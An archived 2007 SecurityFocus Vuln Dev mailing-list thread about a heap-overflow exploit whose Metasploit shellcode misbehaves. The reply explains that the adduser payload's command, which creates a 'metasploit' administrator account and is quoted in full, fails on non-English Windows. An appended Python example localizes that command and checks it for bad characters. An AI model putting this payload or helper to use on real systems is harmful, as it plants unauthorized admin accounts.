Vuln Dev
Weird shellcode behavior May 06 2007 05:55PM
gljuposti gmail com (1 reply)
Re: Weird shellcode behavior May 07 2007 06:06AM
Jerome Athias (jerome athias free fr)
Hi,

gljuposti gmail com wrote:
> I am building an exploit (heap OF) and I am experiencing different shellcode behavior depending on a parameter I can in no way associate with this problem. For one parameter value the shellcode gets executed correctly, but for the other, there are problems.
>
> For example, the calc.exe shellcode creates a calc.exe process (I can see it in task manager), but its window is never displayed.
Exploiting the NaviCOPA HTTP server provides a similar scenario,
since there are 2 processes running:
navicpt.exe (behind the shortcut on your desktop ;)
nacicpnt.exe (the targeted process)

Since in the real world you should not just want to run calc on the
target, I assume it's OK :-)
> Some other shellcodes like the add user shellcode don't work at all. I use shellcodes from Metasploit.
>
> The shellcode gets called each time and it hasn't been changed in memory, it just doesn't behave like it should.
>
If you are sure that you correctly found the badchars, the reason could
be that your target is not an English one.
If you edit the shellcode's source code (single_adduser.asm), you will see:
db "cmd.exe /c net user metasploit x /ADD && net localgroup Administrators metasploit /ADD"

For an Italian target, for example, you would have to replace
"Administrators" with something like " Amministratori"
> Has anyone ever experienced something similar or has any idea why it could happen? This leaves me totally confused.
>
> TIA
References:
https://www.securinfos.info/jerome/navicopa_get_overflow.rb
(dev version)
https://www.securinfos.info/old_softwares_vulnerable/_navicpa_old.exe
(vuln version)

PS: I'm thinking of adding a list of the names of the Administrators group
in multiple languages to my MSF eXploit Builder tool, to be able to
modify it on the fly based on the chosen locale:
https://www.securinfos.info/metasploit/MSF_XB.php
So I invite people using a non-English Windows platform to send me the
Administrators group name with the corresponding locale (language).
Thanks in advance ;-)

Hope it helps
/JA
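The locale substitution Jerome describes, as an added example that is not part of the original thread, of Metasploit or of MSF eXploit Builder. It takes the command line from single_adduser.asm as quoted above, swaps in the Administrators group name for a chosen locale, and then checks the resulting bytes against an exploit's bad-character list. Only the English and Italian names come from the thread; the German, French and Spanish entries are assumptions made for this example and should be verified on a target of that locale before use.

```python
# Added example, not code from the original post, from Metasploit or from
# MSF eXploit Builder. Demonstrates localizing the group name embedded in the
# single_adduser payload and checking the result for bad characters.

# Command line as it appears in single_adduser.asm (quoted in the thread).
ORIGINAL_CMD = ("cmd.exe /c net user metasploit x /ADD && "
                "net localgroup Administrators metasploit /ADD")

# Locale -> localized name of the built-in Administrators group.
# "en" and "it" are from the thread; the other entries are assumptions for
# this example and must be confirmed on a real target of that locale.
ADMIN_GROUP_NAMES = {
    "en": "Administrators",
    "it": "Amministratori",
    "de": "Administratoren",   # assumption
    "fr": "Administrateurs",   # assumption
    "es": "Administradores",   # assumption
}


def localize_cmd(cmd: str, locale: str) -> str:
    """Return cmd with the English group name in the 'net localgroup' clause
    replaced by the name for the given locale."""
    group = ADMIN_GROUP_NAMES.get(locale)
    if group is None:
        raise ValueError(f"no Administrators group name known for locale {locale!r}")
    clause = "net localgroup Administrators "
    if clause not in cmd:
        raise ValueError("command line does not contain the English localgroup clause")
    return cmd.replace(clause, f"net localgroup {group} ")


def cmd_bytes(cmd: str) -> bytes:
    """Bytes as the asm 'db' directive would embed them (one byte per char).
    Names outside ASCII would need the target's OEM code page, which this
    example does not model, so they are rejected instead of guessed."""
    return cmd.encode("ascii")


def find_badchars(payload: bytes, badchars: bytes) -> set:
    """Set of byte values in payload that appear in the exploit's badchar list."""
    return {b for b in payload if b in badchars}


def localized_payload_string(locale: str, badchars: bytes) -> tuple:
    """Localize the adduser command and report (bytes, length delta, badchars).
    The length delta matters because changing the embedded string at source
    level shifts everything assembled after it, so the payload must be
    rebuilt from the .asm rather than patched in place."""
    localized = localize_cmd(ORIGINAL_CMD, locale)
    data = cmd_bytes(localized)
    delta = len(localized) - len(ORIGINAL_CMD)
    return data, delta, find_badchars(data, badchars)


if __name__ == "__main__":
    # Typical badchars for an HTTP GET overflow: NUL, LF, CR, space.
    bad = b"\x00\x0a\x0d\x20"
    for loc in ADMIN_GROUP_NAMES:
        data, delta, hits = localized_payload_string(loc, bad)
        print(f"{loc}: len delta {delta:+d}, badchars hit: "
              f"{sorted(f'0x{b:02x}' for b in hits)}")
```

Run as a script it prints, for each locale, how much longer the embedded string becomes and which bad characters the raw string contains. With 0x20 on the badchar list every variant is flagged, since the command line itself contains spaces; that is the normal case and the reason the payload goes through an encoder, so the check is there to confirm that the localized name introduces no new problem bytes beyond those already present in the English string.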

Copyright 2010, SecurityFocus